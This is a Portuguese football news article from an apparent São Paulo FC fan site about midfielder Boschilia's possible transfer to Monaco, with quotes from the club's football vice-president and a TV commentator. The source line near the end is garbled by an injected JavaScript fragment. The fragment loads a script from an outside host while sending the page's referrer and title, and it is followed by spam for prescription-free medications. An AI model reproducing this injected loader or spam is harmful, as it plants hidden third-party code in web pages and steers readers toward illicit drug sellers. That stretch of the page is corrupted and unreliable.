Destaque

Boschilia se esquiva sobre Monaco, mas São Paulo mantém negociações

Boschilia deve ser mais um a deixar o São Paulo nesta temporada, mas prefere ainda não falar sobre o assunto. No desembarque no Aeroporto de Congonhas nesta quinta-feira, o meia tricolor se esquivou ao ser questionado sobre uma possível transferência ao Monaco.

– Não sei de nada. Isso é com o meu empresário – disse o jogador.

Os valores da negociação devem chegar a 10 milhões de euros (cerca de R$ 37 milhões) pelo jogador – o clube tem 50% dos direitos econômicos. No aeroporto, Ataíde Gil Guerreiro negou que o negócio já esteja sacramentado, e não colocou um prazo para concretizá-lo

– Existe uma negociação que vai ser demorada, estamos no início dela, temos até 31 de agosto. Estou com sangue frio, o Monaco também, e vai demorar um pouco. Isso já tem três meses e eu estava segurando, mas na semana passada tive de fazer uma troca de e-mails e, quando isso chegou ao Morumbi, alguém da minha diretoria contou de maneira equivocada para a imprensa. Não está fechado, pode demorar ou não. Neste momento, existe uma diferença entre o que o São Paulo quer e o que o Monaco quer pagar
– confirmou o vice de futebol do São Paulo.

Em participação no programa “Seleção SporTV” desta quinta-feira, Caio Ribeiro explicou que o Tricolor tenta receber um valor superior ao que tem direito. Por conta dos problemas econômicos, quer amarrar o contrato para conseguir mais dinheiro na transferência.

– Já acertaram que os valores giram em torno de 9 milhões de euros, mas o São Paulo pede mais dos 50% que tem direito porque sente que tem direito de vitrine e de clube formador. O valor final está praticamente acertado e há um consenso que, provavelmente, o Boschilia deixará o São Paulo. A questão é quanto o clube vai pegar na negociação. Ele está pleiteando um pouco mais do que tem direito – disse o comentarista, que conversou com pessoas envolvidas no caso.

A venda de mais um atleta evidencia o momento financeiro delicado vivido pelo clube. Em conversas com seus aliados, o presidente Carlos Miguel Aidar já havia dito que, se boas propostas aparecessem, nenhum atleta era inegociável, o que acabou se confirmando.

Na derrota para o Atlético-MG, por 3 a 1, na quarta-feira, Boschilia substituiu o atacante Luis Fabiano no segundo tempo, mas pouco conseguiu fazer. Na atual temporada, o meia tem três gols marcados.

Fonte: Ges.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; cheap pills put in cart cheat medications without prescription – http://mediolleno.com.sv/sin-categoria/put-in-cart-cheat-medications-without-prescription

Clique para adicionar um comentário

Leave a Reply

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

14 + um =

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.

Destaque

Mais em Destaque

No Morumbi, São Paulo empate com a Chape pelo Brasileirão

saopauloadmin16 de junho de 2021

No Mineirão, São Paulo é derrotado pelo Atlético-MG no Brasileirão

saopauloadmin13 de junho de 2021

Tricolor goleia o 4 de Julho e avança na Copa do Brasil

saopauloadmin8 de junho de 2021

Conmebol define confrontos das oitavas de final da Libertadores; veja os jogos

saopauloadmin1 de junho de 2021

Será? Fernando Torres no São Paulo

saopauloadmin27 de maio de 2021

Com reservas, São Paulo goleia Sporting Cristal

saopauloadmin26 de maio de 2021

Musica: FELIZ DEMAIS! – XAND AVIÃO Feat. SÃO PAULO FC

saopauloadmin24 de maio de 2021

O São Paulo é campeão paulista de 2021!

saopauloadmin23 de maio de 2021

São Paulo contrata meia-atacante Emiliano Rigoni, que estava em time de LaLiga, e pagará parcelado

saopauloadmin22 de maio de 2021